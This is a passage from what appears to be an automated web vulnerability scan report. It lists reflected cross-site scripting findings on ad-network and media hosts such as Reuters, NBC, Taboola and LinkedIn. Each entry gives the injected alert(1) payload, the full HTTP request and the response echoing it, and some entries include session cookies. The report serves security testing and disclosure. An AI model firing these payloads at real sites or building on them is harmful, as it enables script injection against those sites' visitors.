Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:43 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1315097683_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:43 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:43 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 326

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=&e0c23"-alert(1)-"d0a07ccec42=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.57. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3517f"-alert(1)-"f1d43df6b5a was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect3517f"-alert(1)-"f1d43df6b5a&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:35 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097675_1314893682667:57564808264332431; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:35 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:35 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 323

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect3517f"-alert(1)-"f1d43df6b5a&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.58. http://jlinks.industrybrains.com/jsct [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload c816f<script>alert(1)</script>a389a443772 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTINGc816f<script>alert(1)</script>a389a443772&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:47:52 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:47:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 88

// Error: Unknown old section REUTERS_INVESTINGc816f<script>alert(1)</script>a389a443772

5.59. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ad85<script>alert(1)</script>5f200bad0a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp&4ad85<script>alert(1)</script>5f200bad0a2=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:47:56 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:47:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 69

// Error: Unknown parameter 4ad85<script>alert(1)</script>5f200bad0a2

5.60. http://jlinks.industrybrains.com/jsct [tr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload ad4f4<script>alert(1)</script>7e2e605e666 was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETSad4f4<script>alert(1)</script>7e2e605e666&num=4&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:47:53 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:47:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 87

// Error: Site 851 has no section NEWS_MARKETSad4f4<script>alert(1)</script>7e2e605e666

5.61. http://js.www.reuters.com/recommend/re/re [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.www.reuters.com
Path:   /recommend/re/re

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload acc3f%3balert(1)//8f546b5d95b was submitted in the callback parameter. This input was echoed as acc3f;alert(1)//8f546b5d95b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /recommend/re/re?callback=Reuters.tns.updateRecommendationsacc3f%3balert(1)//8f546b5d95b&ed=us&u=9da0587b-a65b-4bca-a7de-c321e48d355a&refreshUrlTimestamp=1315097335859 HTTP/1.1
Host: js.www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; __qseg=Q_D|Q_T; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.2.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; rsi_segs=I07714_10272|I07714_10273

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:02:46 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:12:47 GMT
max-age: 600000
Content-Type: text/javascript;charset=UTF-8
Content-Length: 157

if (typeof Reuters.tns.updateRecommendationsacc3f;alert(1)//8f546b5d95b === 'function') {Reuters.tns.updateRecommendationsacc3f;alert(1)//8f546b5d95b([]);}

5.62. http://lingows.appspot.com/bubble/ [request_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /bubble/

Issue detail

The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload 32dc1<img%20src%3da%20onerror%3dalert(1)>26594ea95cf was submitted in the request_id parameter. This input was echoed as 32dc1<img src=a onerror=alert(1)>26594ea95cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /bubble/?request_id=3_Sacbee32dc1<img%20src%3da%20onerror%3dalert(1)>26594ea95cf&respond_path=LINGO.connect&try=1&key=3_Sacbee&lm=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:29 GMT
Server: Google Frontend
Content-Length: 108

LINGO.connect.respond( {"status": "retry", "key": "3_Sacbee32dc1<img src=a onerror=alert(1)>26594ea95cf"} );

5.63. http://lingows.appspot.com/bubble/ [respond_path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /bubble/

Issue detail

The value of the respond_path request parameter is copied into the HTML document as plain text between tags. The payload 35685<script>alert(1)</script>490b8d7a6b2 was submitted in the respond_path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bubble/?request_id=3_Sacbee&respond_path=LINGO.connect35685<script>alert(1)</script>490b8d7a6b2&try=1&key=3_Sacbee&lm=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:53 GMT
Server: Google Frontend
Content-Length: 105

LINGO.connect35685<script>alert(1)</script>490b8d7a6b2.respond( {"status": "retry", "key": "3_Sacbee"} );

5.64. http://lingows.appspot.com/content/LSXLXVUXQN/ [request_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /content/LSXLXVUXQN/

Issue detail

The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload 9722d<script>alert(1)</script>4b38a362dd7 was submitted in the request_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/LSXLXVUXQN/?request_id=LSXLXVUXQN9722d<script>alert(1)</script>4b38a362dd7&respond_path=LINGO.connect&try=1&count=3&format=embed&mode=data&modified=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&width=300&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5905
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:38 GMT
Server: Google Frontend
Content-Length: 15633

LINGO.connect.respond( {"key": "LSXLXVUXQN9722d<script>alert(1)</script>4b38a362dd7", "status": 200, "quality": "good", "content": {"doc": "\n\n<table class='lingo_widget' style='width: 300;' cellspacing='0' cellpadding='0'>
...[SNIP]...

5.65. http://lingows.appspot.com/content/LSXLXVUXQN/ [respond_path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /content/LSXLXVUXQN/

Issue detail

The value of the respond_path request parameter is copied into the HTML document as plain text between tags. The payload fbbff<script>alert(1)</script>1d4f5de5d1c was submitted in the respond_path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/LSXLXVUXQN/?request_id=LSXLXVUXQN&respond_path=fbbff<script>alert(1)</script>1d4f5de5d1c&try=1&count=3&format=embed&mode=data&modified=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&width=300&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5882
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:08:01 GMT
Server: Google Frontend
Content-Length: 15620

fbbff<script>alert(1)</script>1d4f5de5d1c.respond( {"key": "LSXLXVUXQN", "status": 200, "quality": "good", "content": {"doc": "\n\n<table class='lingo_widget' style='width: 300;' cellspacing='0' cellpadding='0'>
...[SNIP]...

5.66. http://lingows.appspot.com/content/ZXANLLFMOV/ [request_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /content/ZXANLLFMOV/

Issue detail

The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload 16238<script>alert(1)</script>fe8c9be795c was submitted in the request_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/ZXANLLFMOV/?request_id=ZXANLLFMOV16238<script>alert(1)</script>fe8c9be795c&respond_path=LINGO.connect&try=1&format=embed&mode=data&modified=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&width=300&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5917
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:24 GMT
Server: Google Frontend
Content-Length: 18823

LINGO.connect.respond( {"key": "ZXANLLFMOV16238<script>alert(1)</script>fe8c9be795c", "status": 200, "quality": "good", "content": {"doc": "\n\n<table class='lingo_widget' style='width: 300;' cellspacing='0' cellpadding='0'>
...[SNIP]...

5.67. http://lingows.appspot.com/content/ZXANLLFMOV/ [respond_path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /content/ZXANLLFMOV/

Issue detail

The value of the respond_path request parameter is copied into the HTML document as plain text between tags. The payload 56500<script>alert(1)</script>339401737d was submitted in the respond_path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/ZXANLLFMOV/?request_id=ZXANLLFMOV&respond_path=LINGO.connect56500<script>alert(1)</script>339401737d&try=1&format=embed&mode=data&modified=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&width=300&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5894
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:46 GMT
Server: Google Frontend
Content-Length: 18822

LINGO.connect56500<script>alert(1)</script>339401737d.respond( {"key": "ZXANLLFMOV", "status": 200, "quality": "good", "content": {"doc": "\n\n<table class='lingo_widget' style='width: 300;' cellspacing='0' cellpadding='0'>
...[SNIP]...

5.68. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /2/nbc.com/ac@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9d5c"><script>alert(1)</script>31deefb90e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/nbc.comb9d5c"><script>alert(1)</script>31deefb90e7/ac@Bottom3 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; NSC_o4_qsfnjvn_efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 339
Content-Type: text/html

<A HREF="http://premium.mookie1.com/RealMedia/ads/click_lx.ads/nbc.comb9d5c"><script>alert(1)</script>31deefb90e7/ac/1726311578/Bottom3/default/empty.gif/4d686437616b35697a42734143356436?x" target="_top">
...[SNIP]...

5.69. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /2/nbc.com/ac@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d2b6"><script>alert(1)</script>5b6781c6a22 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/nbc.com/ac@Bottom36d2b6"><script>alert(1)</script>5b6781c6a22 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; NSC_o4_qsfnjvn_efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://premium.mookie1.com/RealMedia/ads/click_lx.ads/nbc.com/ac/664256000/Bottom36d2b6"><script>alert(1)</script>5b6781c6a22/default/empty.gif/4d686437616b35697a42734143356436?x" target="_top">
...[SNIP]...

5.70. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 69220<script>alert(1)</script>530070fbb12 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback69220<script>alert(1)</script>530070fbb12 HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA_CP15 (build: CVSTag=https://svn.jboss.org/repos/jbossas/tags/JBoss_4_0_5_GA_CP15 date=200901081058)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:53:57 GMT
Content-Length: 172
Content-Type: text/html

__nbcsnasadops.doSCallback69220<script>alert(1)</script>530070fbb12({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2a8502<script>alert(1)</script>e55be4f7c60"}});

5.71. http://trc.taboolasyndication.com/reuters/trc/2/json [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /reuters/trc/2/json

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload b735b<script>alert(1)</script>6863dfd174b was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reuters/trc/2/json?tim=19%3A48%3A52.780&publisher=reuters&pv=2&list-size=3&list-id=rbox-t2v&id=500&uim=article&intent=s&uip=article&external=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&llvl=1&item-id=USTRE78222D20110904&item-type=text&item-url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&page-id=7ec1fa180194eff20c8fb72aa34c5e7764c06279&sd=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097030&uid=ae7f02b7-d8fc-4e74-9744-efca878a3ea7&cv=4-8-2-1-48560-3339640&uiv=default&cb=TRC.callbacks.recommendations_1b735b<script>alert(1)</script>6863dfd174b HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097030; taboola_wv=; taboola_user_id=ae7f02b7-d8fc-4e74-9744-efca878a3ea7; JSESSIONID=.prod2-f3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 01:03:12 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315098192;Path=/reuters/
Set-Cookie: JSESSIONID=.prod2-f3;Path=/
Set-Cookie: taboola_wv=;Path=/reuters/;Expires=Mon, 03-Sep-12 01:03:12 GMT
Content-Length: 4004

TRC.callbacks.recommendations_1b735b<script>alert(1)</script>6863dfd174b({"trc":{"req":"62cd8c982855cc3f7a6f23b1340af084","session-id":"cf5b371b2ea2c82fafb75969374381dc","session-data":"v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_131
...[SNIP]...

5.72. http://www.linkedin.com/countserv/count/share [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload c23af<img%20src%3da%20onerror%3dalert(1)>8205f4fbbb7 was submitted in the url parameter. This input was echoed as c23af<img src=a onerror=alert(1)>8205f4fbbb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904c23af<img%20src%3da%20onerror%3dalert(1)>8205f4fbbb7 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
